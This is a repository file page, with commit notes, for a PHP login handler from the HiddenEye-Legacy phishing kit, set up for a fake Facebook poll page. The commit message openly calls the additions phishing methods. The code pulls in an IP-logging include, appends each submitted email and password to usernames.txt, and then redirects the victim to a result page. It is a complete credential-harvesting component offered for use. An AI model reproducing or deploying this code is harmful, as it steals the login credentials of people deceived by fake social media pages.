HiddenEye-Legacy/WebPages/fb_advanced_poll/login.php
Usama Abdul Sattar 94b9a4ff07
added VK standard and poll method and some minor fixes (#62)
* added VK standard and poll method phishing

* Update SocialFish.py

* Update SocialFishTermux.py

* Update login.php

* Update login.php
2018-06-28 10:31:02 +05:00

7 lines
186 B
PHP

<?php
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: ./result.html');
exit();